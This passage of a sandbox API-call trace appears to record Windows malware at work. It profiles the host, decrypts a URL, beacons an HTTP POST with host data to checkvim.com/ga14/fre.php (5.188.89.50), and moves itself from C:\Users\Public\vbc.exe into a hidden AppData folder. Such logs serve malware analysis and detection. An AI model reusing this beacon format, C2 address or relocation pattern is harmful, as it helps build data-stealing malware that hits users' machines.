(in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861518 | out: hHeap=0x840000) returned 1 [0187.387] GetProcessHeap () returned 0x840000 [0187.387] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1388) returned 0x8765b0 [0187.387] GetProcessHeap () returned 0x840000 [0187.387] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x8789c8 [0187.387] GetProcessHeap () returned 0x840000 [0187.387] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x11c) returned 0x873a58 [0187.388] RtlGetVersion (in: lpVersionInformation=0x873a58 | out: lpVersionInformation=0x873a58*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0187.388] GetProcessHeap () returned 0x840000 [0187.388] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0187.389] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19f7c0 | out: lpSystemTimeAsFileTime=0x19f7c0*(dwLowDateTime=0x5acda8f2, dwHighDateTime=0x1d7b429)) [0187.389] GetProcessHeap () returned 0x840000 [0187.389] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7) returned 0x871b28 [0187.389] GetProcessHeap () returned 0x840000 [0187.389] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x875e38 [0187.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.391] GetUserNameW (in: lpBuffer=0x875e38, pcbBuffer=0x19f81c | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19f81c) returned 1 [0187.392] GetProcessHeap () returned 0x840000 [0187.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875e38 | out: hHeap=0x840000) returned 1 [0187.392] GetProcessHeap () returned 0x840000 [0187.392] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x875e38 [0187.392] GetComputerNameW (in: lpBuffer=0x875e38, nSize=0x19f81c | out: lpBuffer="XC64ZB", nSize=0x19f81c) returned 1 [0187.393] GetProcessHeap () returned 0x840000 [0187.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875e38 | out: hHeap=0x840000) returned 1 [0187.393] GetCurrentThread () returned 0xfffffffe [0187.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.395] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19f81c | out: TokenHandle=0x19f81c*=0x0) returned 0 [0187.395] GetLastError () returned 0x3f0 [0187.395] GetCurrentProcess () returned 0xffffffff [0187.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.397] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19f81c | out: TokenHandle=0x19f81c*=0x270) returned 1 [0187.397] GetProcessHeap () returned 0x840000 [0187.397] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x875e38 [0187.397] GetProcessHeap () returned 0x840000 [0187.397] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x87eb58 [0187.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.398] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19f818 | out: TokenInformation=0x0, ReturnLength=0x19f818) returned 0 [0187.399] GetProcessHeap () returned 0x840000 [0187.399] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870668 [0187.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.400] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x1, TokenInformation=0x870668, TokenInformationLength=0x24, ReturnLength=0x19f818 | out: TokenInformation=0x870668, ReturnLength=0x19f818) returned 1 [0187.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.401] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x870670*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x875e38, cchName=0x19f808, ReferencedDomainName=0x87eb58, cchReferencedDomainName=0x19f80c, peUse=0x19f804 | out: Name="RDhJ0CNFevzX", cchName=0x19f808, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19f80c, peUse=0x19f804) returned 1 [0187.403] GetProcessHeap () returned 0x840000 [0187.403] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f44) returned 0x8805c8 [0187.404] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0187.405] wvsprintfW (in: param_1=0x8805c8, param_2="%s", arglist=0x19f7f4 | out: param_1="XC64ZB") returned 6 [0187.405] GetProcessHeap () returned 0x840000 [0187.405] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878a70 [0187.405] GetProcessHeap () returned 0x840000 [0187.405] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0187.405] GetProcessHeap () returned 0x840000 [0187.405] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870668 | out: hHeap=0x840000) returned 1 [0187.405] CloseHandle (hObject=0x270) returned 1 [0187.405] GetProcessHeap () returned 0x840000 [0187.406] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87eb58 | out: hHeap=0x840000) returned 1 [0187.406] GetProcessHeap () returned 0x840000 [0187.406] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875e38 | out: hHeap=0x840000) returned 1 [0187.406] GetProcessHeap () returned 0x840000 [0187.406] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878a70 | out: hHeap=0x840000) returned 1 [0187.406] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0187.407] GetDesktopWindow () returned 0x10010 [0187.408] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0187.408] GetWindowRect (in: hWnd=0x10010, lpRect=0x19f810 | out: lpRect=0x19f810) returned 1 [0187.439] GetProcessHeap () returned 0x840000 [0187.439] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x8) returned 0x871c28 [0187.439] GetProcessHeap () returned 0x840000 [0187.439] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c28 | out: hHeap=0x840000) returned 1 [0187.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.442] GetUserNameW (in: lpBuffer=0x19f610, pcbBuffer=0x19f818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19f818) returned 1 [0187.443] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x769b0000 [0187.444] GetProcAddress (hModule=0x769b0000, lpProcName="NetUserGetInfo") returned 0x658b33a0 [0187.444] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19f81c | out: bufptr=0x87f6c8*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0x124bb6, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0187.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.451] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19f808, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19f810 | out: pSid=0x19f810*=0x878ab8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0187.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.452] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x878ab8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19f814 | out: IsMember=0x19f814) returned 1 [0187.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.454] GetNativeSystemInfo (in: lpSystemInfo=0x19f7ec | out: lpSystemInfo=0x19f7ec*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5507)) [0187.454] GetProcessHeap () returned 0x840000 [0187.454] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0187.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.455] CryptAcquireContextW (in: phProv=0x19f5c8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f5c8*=0x0) returned 1 [0187.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.462] CryptAcquireContextW (in: phProv=0x19f5c8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f5c8*=0x87ea48) returned 1 [0187.468] GetProcessHeap () returned 0x840000 [0187.468] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8706c8 [0187.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.469] CryptImportKey (in: hProv=0x87ea48, pbData=0x8706c8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f5cc | out: phKey=0x19f5cc*=0x87e3f0) returned 1 [0187.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.471] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x4, pbData=0x19f5c4*=0x1, dwFlags=0x0) returned 1 [0187.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.472] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.472] GetProcessHeap () returned 0x840000 [0187.472] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8706c8 | out: hHeap=0x840000) returned 1 [0187.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.474] CryptDecrypt (in: hKey=0x87e3f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f61c | out: pbData=0x87f5f0, pdwDataLen=0x19f61c) returned 1 [0187.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.475] CryptDestroyKey (hKey=0x87e3f0) returned 1 [0187.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.476] CryptReleaseContext (hProv=0x87ea48, dwFlags=0x0) returned 1 [0187.476] GetProcessHeap () returned 0x840000 [0187.476] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x875e38 [0187.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0187.477] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0187.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0187.478] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0187.478] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0187.479] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0187.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0187.479] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0187.479] GetProcessHeap () returned 0x840000 [0187.479] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0187.485] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f5d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f5f8 | out: ppResult=0x19f5f8*=0x0) returned 11001 [0187.499] GetProcessHeap () returned 0x840000 [0187.499] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0187.499] GetProcessHeap () returned 0x840000 [0187.499] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875e38 | out: hHeap=0x840000) returned 1 [0187.499] GetProcessHeap () returned 0x840000 [0187.499] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0187.499] GetProcessHeap () returned 0x840000 [0187.499] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0187.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.501] CryptAcquireContextW (in: phProv=0x19f5c8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f5c8*=0x0) returned 1 [0187.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.507] CryptAcquireContextW (in: phProv=0x19f5c8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f5c8*=0x87ea48) returned 1 [0187.514] GetProcessHeap () returned 0x840000 [0187.514] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0187.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.515] CryptImportKey (in: hProv=0x87ea48, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f5cc | out: phKey=0x19f5cc*=0x87e2f0) returned 1 [0187.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.516] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f5c4*=0x1, dwFlags=0x0) returned 1 [0187.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.516] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.516] GetProcessHeap () returned 0x840000 [0187.516] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0187.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.517] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f61c | out: pbData=0x87f5f0, pdwDataLen=0x19f61c) returned 1 [0187.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.518] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0187.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0187.519] CryptReleaseContext (hProv=0x87ea48, dwFlags=0x0) returned 1 [0187.519] GetProcessHeap () returned 0x840000 [0187.519] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x875e38 [0187.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0187.520] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0187.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0187.521] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0187.522] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0187.522] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0187.522] GetProcessHeap () returned 0x840000 [0187.522] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871268 [0187.522] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f5d8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f5f8 | out: ppResult=0x19f5f8*=0x871588*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0187.546] GetProcessHeap () returned 0x840000 [0187.546] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ba8 [0187.546] socket (af=2, type=1, protocol=6) returned 0x284 [0187.546] connect (s=0x284, name=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0187.623] FreeAddrInfoW (pAddrInfo=0x871588*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0187.623] GetProcessHeap () returned 0x840000 [0187.623] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x87eb58 [0187.623] GetProcessHeap () returned 0x840000 [0187.623] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0187.624] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0187.625] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f600 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0187.625] GetProcessHeap () returned 0x840000 [0187.625] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87ebe0 [0187.626] GetProcessHeap () returned 0x840000 [0187.626] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0187.626] GetProcessHeap () returned 0x840000 [0187.626] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fc20 [0187.626] GetProcessHeap () returned 0x840000 [0187.626] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0187.626] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0187.627] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f600 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 186\r\nConnection: close\r\n\r\n") returned 237 [0187.627] GetProcessHeap () returned 0x840000 [0187.627] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x87ec98 [0187.627] GetProcessHeap () returned 0x840000 [0187.627] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0187.627] send (s=0x284, buf=0x87ec98*, len=237, flags=0) returned 237 [0187.628] send (s=0x284, buf=0x8765b0*, len=186, flags=0) returned 186 [0187.628] GetProcessHeap () returned 0x840000 [0187.628] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8805c8 [0187.628] recv (in: s=0x284, buf=0x8805c8, len=4048, flags=0 | out: buf=0x8805c8*) returned 229 [0188.069] GetProcessHeap () returned 0x840000 [0188.069] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87ec98 | out: hHeap=0x840000) returned 1 [0188.069] GetProcessHeap () returned 0x840000 [0188.069] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0188.069] GetProcessHeap () returned 0x840000 [0188.069] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87ebe0 | out: hHeap=0x840000) returned 1 [0188.069] GetProcessHeap () returned 0x840000 [0188.069] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87eb58 | out: hHeap=0x840000) returned 1 [0188.069] closesocket (s=0x284) returned 0 [0188.070] GetProcessHeap () returned 0x840000 [0188.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ba8 | out: hHeap=0x840000) returned 1 [0188.070] GetProcessHeap () returned 0x840000 [0188.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875e38 | out: hHeap=0x840000) returned 1 [0188.070] GetProcessHeap () returned 0x840000 [0188.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0188.070] GetProcessHeap () returned 0x840000 [0188.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871268 | out: hHeap=0x840000) returned 1 [0188.070] GetProcessHeap () returned 0x840000 [0188.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0188.070] GetProcessHeap () returned 0x840000 [0188.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8765b0 | out: hHeap=0x840000) returned 1 [0188.070] GetProcessHeap () returned 0x840000 [0188.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8789c8 | out: hHeap=0x840000) returned 1 [0188.070] GetProcessHeap () returned 0x840000 [0188.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b28 | out: hHeap=0x840000) returned 1 [0188.070] GetProcessHeap () returned 0x840000 [0188.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f220 | out: hHeap=0x840000) returned 1 [0188.070] GetProcessHeap () returned 0x840000 [0188.070] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878b48 | out: hHeap=0x840000) returned 1 [0188.071] GetProcessHeap () returned 0x840000 [0188.071] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x875e38 [0188.071] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x875e38, nSize=0x103 | out: lpFilename="C:\\Users\\Public\\vbc.exe" (normalized: "c:\\users\\public\\vbc.exe")) returned 0x17 [0188.071] GetProcessHeap () returned 0x840000 [0188.071] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x87eb58 [0188.072] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0188.073] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x87eb58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0188.073] GetProcessHeap () returned 0x840000 [0188.073] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f58) returned 0x8805c8 [0188.074] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0188.075] wvsprintfW (in: param_1=0x8805c8, param_2="%s\\%s\\%s.exe", arglist=0x19f9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 55 [0188.075] GetProcessHeap () returned 0x840000 [0188.075] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x72) returned 0x860c98 [0188.075] GetProcessHeap () returned 0x840000 [0188.075] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0188.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0188.076] StrStrW (lpFirst="C:\\Users\\Public\\vbc.exe", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 0x0 [0188.076] GetProcessHeap () returned 0x840000 [0188.076] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x8805c8 [0188.077] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0188.078] wvsprintfW (in: param_1=0x8805c8, param_2="%s\\%s", arglist=0x19fa08 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0188.078] GetProcessHeap () returned 0x840000 [0188.078] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5c) returned 0x873a58 [0188.078] GetProcessHeap () returned 0x840000 [0188.078] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0188.078] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0188.079] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\vbc.exe" (normalized: "c:\\users\\public\\vbc.exe"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.exe"), dwFlags=0x1) returned 1 [0188.080] GetProcessHeap () returned 0x840000 [0188.080] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x87f010 [0188.081] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0188.082] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x87f010 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0188.082] GetProcessHeap () returned 0x840000 [0188.082] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x8805c8 [0188.082] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0188.083] wvsprintfW (in: param_1=0x8805c8, param_2="%s\\%s", arglist=0x19f7f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0188.083] GetProcessHeap () returned 0x840000 [0188.084] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5c) returned 0x873ac0 [0188.084] GetProcessHeap () returned 0x840000 [0188.084] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0188.084] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0188.084] GetProcessHeap () returned 0x840000 [0188.084] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f50) returned 0x8805c8 [0188.085] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0188.086] wvsprintfW (in: param_1=0x8805c8, param_2="%s\\%s.%s", arglist=0x19f804 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 55 [0188.086] GetProcessHeap () returned 0x840000 [0188.086] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x72) returned 0x861118 [0188.086] GetProcessHeap () returned 0x840000 [0188.086] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0188.086] GetProcessHeap () returned 0x840000 [0188.086] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873ac0 | out: hHeap=0x840000) returned 1 [0188.086] GetProcessHeap () returned 0x840000 [0188.086] HeapFree (in: hHeap=0x840000, 